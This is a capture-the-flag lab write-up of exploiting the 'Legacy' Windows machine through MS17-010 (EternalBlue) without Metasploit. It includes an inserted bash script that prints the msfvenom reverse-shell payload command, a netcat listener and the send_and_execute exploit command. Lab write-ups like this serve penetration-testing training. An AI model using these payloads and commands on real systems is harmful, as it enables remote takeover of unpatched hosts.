Legacy (Windows) OSCP TJ Null List W/O Metasploit

Adarsh Lal
Jan 6, 2021

Hi all, this is my second machine write-up from the OSCP TJ Null list, and today we are writing up Legacy, an easy Windows machine. Let's have a look at it.

First, we start with a full nmap scan, as seen below.

We ran nmap -sC -sV -p- 10.10.10.4

  • -sC: runs nmap's default script set against every open port
  • -sV: probes each service for its version
  • -p-: scans all 65535 TCP ports instead of nmap's default top 1000

From this we understood that SMB was the juiciest place to look for an entry point. So we enumerated SMB further, again with nmap, this time using its SMB vulnerability scripts: nmap --script smb-vuln* -p 139,445 10.10.10.4 (quote the wildcard, 'smb-vuln*', if your shell tries to expand it). These scripts check the target for a set of known SMB vulnerabilities and report the state of each one (VULNERABLE, LIKELY VULNERABLE, false, or ERROR if the check could not run), as we can see below.

From here we found a couple of vulnerabilities, and MS17-010 (the SMBv1 flaw behind EternalBlue) is the clear choice; its state is reported as VULNERABLE, so exploitation should definitely work. Since we can't use Metasploit, we searched for a way to exploit this vulnerability manually, and the method we found is explained in detail at this link. As described on that page, we cloned the GitHub repository, as seen below.

After cloning and moving into the directory, we generated a reverse-shell executable with msfvenom and placed it in that directory. With the payload in place we did the following, as we can see in the image below.

So we created the reverse shell with msfvenom, named it eternalblue, and saved it in the directory. Then, as seen above, we ran send_and_execute.py with the target IP and the payload, and it successfully triggered the vulnerability. On the other side we had a netcat listener set up beforehand (start the listener before running the script, and make sure the LHOST and LPORT baked into the payload match it), and once the payload executed we got a shell on the target machine, as we can see below.
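The two steps above, reading the smb-vuln script results and then running the manual exploitation commands, can be tied together in a small triage script. The following is an added example and not code from the original write-up or from the repository it links to. The scan text inside it is a constructed sample in nmap's normal-output format, not output captured from the target; only the target 10.10.10.4, the payload name eternalblue and the script name send_and_execute.py come from the write-up. The attacker address 10.10.14.5, the listener port 4444, and the argument order of send_and_execute.py (target first, payload second) are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): triage the output of
#   nmap --script 'smb-vuln*' -p 139,445 10.10.10.4
# and print the manual (no-Metasploit) exploitation commands described in the write-up.
# SAMPLE_SCAN is a CONSTRUCTED sample in nmap's normal-output format. The attacker
# address 10.10.14.5 and port 4444 are assumptions, as is the argument order of
# send_and_execute.py.

SAMPLE_SCAN='Host script results:
| smb-vuln-ms10-054: false
| smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'

# Read nmap output on stdin and emit one "script<TAB>state" line per smb-vuln-* script.
# Single-line results ("false", "ERROR: ...") use that first token as the state;
# multi-line results use the value of their "State:" field.
parse_smb_vuln() {
  awk '
    /^\| smb-vuln-/ {
      if (name != "") print name "\t" state
      name = $2; sub(/:$/, "", name)
      state = ($3 == "") ? "unknown" : $3
      next
    }
    /State:/ { state = $0; sub(/.*State: */, "", state) }
    END { if (name != "") print name "\t" state }
  '
}

# Keep only scripts whose state is exactly VULNERABLE: not LIKELY VULNERABLE,
# not false, and not ERROR (an ERROR means the check did not run, not that it passed).
confirmed_vulns() {
  parse_smb_vuln | awk -F '\t' '$2 == "VULNERABLE" { print $1 }'
}

# Print the three commands of the write-up's procedure, in the order they must run:
# build the payload, start the listener, then deliver and execute the payload.
exploit_commands() {
  local target="$1" lhost="$2" lport="$3"
  printf 'msfvenom -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -f exe -o eternalblue.exe\n' "$lhost" "$lport"
  printf 'nc -lvnp %s\n' "$lport"
  printf 'python send_and_execute.py %s eternalblue.exe\n' "$target"
}

# Usage: ./triage.sh [saved-nmap-output.txt]; without a file the constructed sample is used.
scan_input() {
  if [ -n "${1:-}" ]; then cat "$1"; else printf '%s\n' "$SAMPLE_SCAN"; fi
}

if scan_input "${1:-}" | confirmed_vulns | grep -q '^smb-vuln-ms17-010$'; then
  echo "# ms17-010 reported VULNERABLE; manual exploitation steps:"
  exploit_commands 10.10.10.4 10.10.14.5 4444
else
  echo "# ms17-010 not confirmed as VULNERABLE; re-run nmap with -d before exploiting"
fi
```

Save the real scan with nmap's -oN option and pass the file as the first argument to triage it instead of the sample. The point of the state check is that smb-vuln-ms17-010 can also report ERROR when SMB negotiation fails, which is not the same as the host being patched.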

From there we searched the filesystem for root.txt, as we can see below.

As we can see below, we moved to the C: drive and searched for root.txt; the search found it and we read the flag. Then we went back to C: and searched for user.txt in the same way, and grabbed it as well. That's all for this machine; it was pretty basic. I'm now done with two machines from the list and hope to complete the rest as well. I will try harder ;) Thank you all for reading.
